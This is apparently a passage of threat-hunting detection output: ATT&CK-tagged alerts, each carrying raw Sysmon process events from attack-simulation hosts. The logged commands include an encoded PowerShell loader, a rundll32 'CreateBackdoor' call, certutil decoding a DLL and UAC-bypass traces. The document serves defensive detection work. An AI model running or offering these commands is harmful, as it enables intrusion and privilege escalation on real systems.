</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T02:08:00.446150Z"">
</TimeCreated>
<EventRecordID>11126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1904"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 02:08:00.336</Data>
<Data Name=""ProcessGuid"">365ABB72-8B80-5CD3-0000-001065512A00</Data>
<Data Name=""ProcessId"">2264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
<Data Name=""LogonId"">0x1394a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8B77-5CD3-0000-0010E8FD2900</Data>
<Data Name=""ParentProcessId"">3836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sdclt.exe</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
</TimeCreated>
<EventRecordID>243514</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
<Data Name=""ProcessId"">8116</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
</TimeCreated>
<EventRecordID>243514</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
<Data Name=""ProcessId"">8116</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.204919Z"">
</TimeCreated>
<EventRecordID>5982</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.164</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010B2E2FF00</Data>
<Data Name=""ProcessId"">2108</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T15:08:07.558917Z"">
</TimeCreated>
<EventRecordID>5532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 15:08:07.355</Data>
<Data Name=""ProcessGuid"">747F3D96-A357-5D45-0000-0010BD149A01</Data>
<Data Name=""ProcessId"">5396</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A356-5D45-0000-001014F99901</Data>
<Data Name=""ParentProcessId"">4056</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mmc.exe&quot; eventvwr.msc</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-12T15:06:49.447990Z"">
</TimeCreated>
<EventRecordID>143189</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2856"" ThreadID=""3608"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-12 15:06:49.415</Data>
<Data Name=""ProcessGuid"">747F3D96-BB89-5EBA-0000-001019683600</Data>
<Data Name=""ProcessId"">4688</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B086-5EBA-0000-0020BF9E0800</Data>
<Data Name=""LogonId"">0x89ebf</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-BB89-5EBA-0000-001042653600</Data>
<Data Name=""ParentProcessId"">1088</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
</TimeCreated>
<EventRecordID>4890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
<Data Name=""ProcessId"">700</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T18:10:42.668784Z"">
</TimeCreated>
<EventRecordID>16150</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 18:10:42.653</Data>
<Data Name=""ProcessGuid"">365ABB72-1022-5CD7-0000-0010DF121C00</Data>
<Data Name=""ProcessId"">3248</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-8693-5CD7-0000-0010765E0000</Data>
<Data Name=""ParentProcessId"">492</Data>
<Data Name=""ParentImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\lsass.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
</TimeCreated>
<EventRecordID>4890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
<Data Name=""ProcessId"">700</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
